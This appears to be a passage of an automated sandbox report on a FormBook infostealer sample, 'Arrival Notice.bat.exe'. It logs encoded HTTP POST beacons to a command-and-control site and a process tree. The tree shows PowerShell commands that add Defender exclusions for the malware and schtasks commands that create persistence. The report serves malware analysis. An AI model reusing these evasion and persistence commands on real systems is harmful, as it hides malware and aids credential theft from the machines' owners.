                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Connection: close
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Cache-Control: no-cache
                                                                            Content-Length: 203
                                                                            Origin: http://www.futuregainers.net
                                                                            Referer: http://www.futuregainers.net/l4k7/
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko
                                                                            Data Raw: 74 46 31 74 6b 36 3d 58 64 4c 53 4f 61 62 70 44 79 63 2b 4d 78 59 6b 4b 59 77 79 6f 54 44 31 58 2b 71 68 69 78 57 35 48 38 45 38 64 4b 76 7a 5a 50 2b 62 73 6c 43 42 4b 75 46 48 75 52 65 67 58 31 4d 30 42 48 59 55 32 58 73 42 74 58 31 5a 34 55 67 4d 79 2f 35 5a 65 64 54 57 51 56 31 52 6f 70 69 76 6a 4f 74 54 48 78 2f 52 2b 51 53 4e 47 4a 6c 47 46 75 64 34 30 38 68 47 74 39 33 76 70 70 4b 42 4e 66 2b 63 46 78 6a 71 35 6b 37 59 35 76 55 67 54 4f 54 47 53 76 63 42 4b 64 4b 54 69 42 41 32 72 79 4f 57 69 52 4f 71 78 6f 6d 37 50 6c 43 39 79 61 32 58 4a 6d 43 70 59 47 7a 4f 76 2b 55 4f 63 4e 43 4a 65 41 3d 3d
                                                                            Data Ascii: tF1tk6=XdLSOabpDyc+MxYkKYwyoTD1X+qhixW5H8E8dKvzZP+bslCBKuFHuRegX1M0BHYU2XsBtX1Z4UgMy/5ZedTWQV1RopivjOtTHx/R+QSNGJlGFud408hGt93vppKBNf+cFxjq5k7Y5vUgTOTGSvcBKdKTiBA2ryOWiROqxom7PlC9ya2XJmCpYGzOv+UOcNCJeA==
                                                                            Jun 19, 2024 22:42:08.242769957 CEST1070INHTTP/1.1 301 Moved Permanently
                                                                            Connection: close
                                                                            content-type: text/html
                                                                            content-length: 795
                                                                            date: Wed, 19 Jun 2024 20:42:08 GMT
                                                                            server: LiteSpeed
                                                                            location: https://www.futuregainers.net/l4k7/
                                                                            platform: hostinger
                                                                            content-security-policy: upgrade-insecure-requests
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                                                            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            56192.168.2.449802195.35.39.11980
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 19, 2024 22:42:10.202162981 CEST725OUTPOST /l4k7/ HTTP/1.1
                                                                            Host: www.futuregainers.net
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Connection: close
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Cache-Control: no-cache
                                                                            Content-Length: 223
                                                                            Origin: http://www.futuregainers.net
                                                                            Referer: http://www.futuregainers.net/l4k7/
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko
                                                                            Data Raw: 74 46 31 74 6b 36 3d 58 64 4c 53 4f 61 62 70 44 79 63 2b 4e 51 6f 6b 49 2f 73 79 75 7a 44 32 59 65 71 68 30 42 57 39 48 38 49 38 64 4c 71 30 65 39 4b 62 76 42 4b 42 4a 73 74 48 69 78 65 67 44 46 4d 39 46 48 59 66 32 58 6f 4a 74 56 78 5a 34 55 30 4d 79 37 78 5a 65 75 37 56 57 46 31 54 67 4a 69 68 2b 65 74 54 48 78 2f 52 2b 55 36 6a 47 4a 4e 47 45 65 74 34 31 59 39 46 7a 74 33 75 6f 70 4b 42 48 50 2f 56 46 78 69 35 35 6c 33 32 35 70 51 67 54 4f 6a 47 53 39 6b 43 42 64 4b 52 76 68 41 6e 75 43 48 2f 73 69 65 37 37 65 6d 6d 42 52 47 4a 36 38 6e 4e 59 58 6a 2b 4b 47 58 39 79 35 64 36 52 4f 2f 41 46 50 69 4b 43 30 43 46 43 38 4c 2b 52 72 32 67 6a 66 77 46 6d 48 49 3d
                                                                            Data Ascii: tF1tk6=XdLSOabpDyc+NQokI/syuzD2Yeqh0BW9H8I8dLq0e9KbvBKBJstHixegDFM9FHYf2XoJtVxZ4U0My7xZeu7VWF1TgJih+etTHx/R+U6jGJNGEet41Y9Fzt3uopKBHP/VFxi55l325pQgTOjGS9kCBdKRvhAnuCH/sie77emmBRGJ68nNYXj+KGX9y5d6RO/AFPiKC0CFC8L+Rr2gjfwFmHI=
                                                                            Jun 19, 2024 22:42:10.796937943 CEST1070INHTTP/1.1 301 Moved Permanently
                                                                            Connection: close
                                                                            content-type: text/html
                                                                            content-length: 795
                                                                            date: Wed, 19 Jun 2024 20:42:10 GMT
                                                                            server: LiteSpeed
                                                                            location: https://www.futuregainers.net/l4k7/
                                                                            platform: hostinger
                                                                            content-security-policy: upgrade-insecure-requests
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                                                            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                                            Statistics

                                                                            CPU Usage

                                                                            Click to jump to process

                                                                            Memory Usage

                                                                            Click to jump to process

                                                                            High Level Behavior Distribution

                                                                            Click to dive into process behavior distribution

                                                                            Behavior

                                                                            Click to jump to process

                                                                            System Behavior

                                                                            General

                                                                            Target ID:0
                                                                            Start time:16:37:56
                                                                            Start date:19/06/2024
                                                                            Path:C:\Users\user\Desktop\Arrival Notice.bat.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Users\user\Desktop\Arrival Notice.bat.exe"
                                                                            Imagebase:0xb00000
                                                                            File size:688'640 bytes
                                                                            MD5 hash:615F92F0ECEF4EB70DE1C52CEE091948
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:low
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:2
                                                                            Start time:16:37:58
                                                                            Start date:19/06/2024
                                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Arrival Notice.bat.exe"
                                                                            Imagebase:0xd50000
                                                                            File size:433'152 bytes
                                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:3
                                                                            Start time:16:37:58
                                                                            Start date:19/06/2024
                                                                            Path:C:\Windows\System32\conhost.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                            Imagebase:0x7ff7699e0000
                                                                            File size:862'208 bytes
                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:4
                                                                            Start time:16:37:58
                                                                            Start date:19/06/2024
                                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\dLrZsz.exe"
                                                                            Imagebase:0xd50000
                                                                            File size:433'152 bytes
                                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:5
                                                                            Start time:16:37:58
                                                                            Start date:19/06/2024
                                                                            Path:C:\Windows\System32\conhost.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                            Imagebase:0x7ff7699e0000
                                                                            File size:862'208 bytes
                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:6
                                                                            Start time:16:37:58
                                                                            Start date:19/06/2024
                                                                            Path:C:\Windows\SysWOW64\schtasks.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dLrZsz" /XML "C:\Users\user\AppData\Local\Temp\tmp4908.tmp"
                                                                            Imagebase:0x920000
                                                                            File size:187'904 bytes
                                                                            MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:7
                                                                            Start time:16:37:58
                                                                            Start date:19/06/2024
                                                                            Path:C:\Windows\System32\conhost.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                            Imagebase:0x7ff7699e0000
                                                                            File size:862'208 bytes
                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:8
                                                                            Start time:16:37:59
                                                                            Start date:19/06/2024
                                                                            Path:C:\Users\user\Desktop\Arrival Notice.bat.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Users\user\Desktop\Arrival Notice.bat.exe"
                                                                            Imagebase:0x7ff6ec4b0000
                                                                            File size:688'640 bytes
                                                                            MD5 hash:615F92F0ECEF4EB70DE1C52CEE091948
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.2005620217.00000000018D0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.2005620217.00000000018D0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.2005850600.0000000002410000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.2005850600.0000000002410000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.2003682546.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.2003682546.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                            Reputation:low
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:9
                                                                            Start time:16:37:59
                                                                            Start date:19/06/2024
                                                                            Path:C:\Users\user\AppData\Roaming\dLrZsz.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:C:\Users\user\AppData\Roaming\dLrZsz.exe
                                                                            Imagebase:0x520000
                                                                            File size:688'640 bytes
                                                                            MD5 hash:615F92F0ECEF4EB70DE1C52CEE091948
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Antivirus matches:
                                                                            • Detection: 100%, Joe Sandbox ML
                                                                            • Detection: 26%, ReversingLabs
                                                                            Reputation:low
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:10
                                                                            Start time:16:38:02
                                                                            Start date:19/06/2024
                                                                            Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                            Imagebase:0x7ff693ab0000
                                                                            File size:496'640 bytes
                                                                            MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:11
                                                                            Start time:16:38:04
                                                                            Start date:19/06/2024
                                                                            Path:C:\Windows\SysWOW64\schtasks.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dLrZsz" /XML "C:\Users\user\AppData\Local\Temp\tmpEFDB.tmp"
                                                                            Imagebase:0x920000
                                                                            File size:187'904 bytes
                                                                            MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:12
                                                                            Start time:16:38:04
                                                                            Start date:19/06/2024
                                                                            Path:C:\Windows\System32\conhost.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                            Imagebase:0x7ff7699e0000
                                                                            File size:862'208 bytes
                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:13
                                                                            Start time:16:38:04
                                                                            Start date:19/06/2024
                                                                            Path:C:\Users\user\AppData\Roaming\dLrZsz.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Users\user\AppData\Roaming\dLrZsz.exe"
                                                                            Imagebase:0xa10000
                                                                            File size:688'640 bytes
                                                                            MD5 hash:615F92F0ECEF4EB70DE1C52CEE091948
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:low
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:17
                                                                            Start time:16:38:21
                                                                            Start date:19/06/2024
                                                                            Path:C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exe"
                                                                            Imagebase:0x3c0000
                                                                            File size:140'800 bytes
                                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000011.00000002.4145476325.0000000003AB0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000011.00000002.4145476325.0000000003AB0000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                                            Reputation:high
                                                                            Has exited:false

                                                                            General

                                                                            Target ID:18
                                                                            Start time:16:38:23
                                                                            Start date:19/06/2024
                                                                            Path:C:\Windows\SysWOW64\compact.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Windows\SysWOW64\compact.exe"
                                                                            Imagebase:0x400000
                                                                            File size:41'472 bytes
                                                                            MD5 hash:5CB107F69062D6D387F4F7A14737220E
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000012.00000002.4145840212.0000000002A20000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000012.00000002.4145840212.0000000002A20000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000012.00000002.4145942819.0000000002A60000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000012.00000002.4145942819.0000000002A60000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000012.00000002.4143205366.00000000024B0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000012.00000002.4143205366.00000000024B0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                            Reputation:moderate
                                                                            Has exited:false

                                                                            General

                                                                            Target ID:19
                                                                            Start time:16:38:36
                                                                            Start date:19/06/2024
                                                                            Path:C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exe"
                                                                            Imagebase:0x3c0000
                                                                            File size:140'800 bytes
                                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000013.00000002.4147800420.0000000005740000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000013.00000002.4147800420.0000000005740000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                            Reputation:high
                                                                            Has exited:false

                                                                            General

                                                                            Target ID:20
                                                                            Start time:16:38:52
                                                                            Start date:19/06/2024
                                                                            Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                            Imagebase:0x7ff6bf500000
                                                                            File size:676'768 bytes
                                                                            MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:22
                                                                            Start time:16:40:17
                                                                            Start date:19/06/2024
                                                                            Path:C:\Users\user\AppData\Local\Temp\-6qxw.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Users\user\AppData\Local\Temp\-6qxw.exe"
                                                                            Imagebase:0x80000
                                                                            File size:695'808 bytes
                                                                            MD5 hash:BD0CF4524C08026BA27005393E1F93A9
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Antivirus matches:
                                                                            • Detection: 100%, Joe Sandbox ML
                                                                            • Detection: 62%, ReversingLabs
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:23
                                                                            Start time:16:40:18
                                                                            Start date:19/06/2024
                                                                            Path:C:\Users\user\AppData\Local\Temp\-6qxw.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:"C:\Users\user\AppData\Local\Temp\-6qxw.exe"
                                                                            Imagebase:0x220000
                                                                            File size:695'808 bytes
                                                                            MD5 hash:BD0CF4524C08026BA27005393E1F93A9
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:24
                                                                            Start time:16:40:18
                                                                            Start date:19/06/2024
                                                                            Path:C:\Users\user\AppData\Local\Temp\-6qxw.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Users\user\AppData\Local\Temp\-6qxw.exe"
                                                                            Imagebase:0x5f0000
                                                                            File size:695'808 bytes
                                                                            MD5 hash:BD0CF4524C08026BA27005393E1F93A9
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000018.00000002.3466776622.00000000010B0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000018.00000002.3466776622.00000000010B0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000018.00000002.3464254438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000018.00000002.3464254438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000018.00000002.3470248065.0000000001470000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000018.00000002.3470248065.0000000001470000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:25
                                                                            Start time:16:40:47
                                                                            Start date:19/06/2024
                                                                            Path:C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exe"
                                                                            Imagebase:0x3c0000
                                                                            File size:140'800 bytes
                                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000019.00000002.4145544196.0000000002600000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000019.00000002.4145544196.0000000002600000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                                            Has exited:false

                                                                            General

                                                                            Target ID:26
                                                                            Start time:16:40:49
                                                                            Start date:19/06/2024
                                                                            Path:C:\Windows\SysWOW64\runonce.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Windows\SysWOW64\runonce.exe"
                                                                            Imagebase:0xdd0000
                                                                            File size:47'104 bytes
                                                                            MD5 hash:9E16655119DDE1B24A741C4FD4AD08FC
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000001A.00000002.4145607762.0000000000D10000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000001A.00000002.4145607762.0000000000D10000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000001A.00000002.4145710569.0000000000D50000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000001A.00000002.4145710569.0000000000D50000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000001A.00000002.4143217663.0000000000800000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000001A.00000002.4143217663.0000000000800000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                            Has exited:false

                                                                            General

                                                                            Target ID:27
                                                                            Start time:16:41:02
                                                                            Start date:19/06/2024
                                                                            Path:C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exe"
                                                                            Imagebase:0x3c0000
                                                                            File size:140'800 bytes
                                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
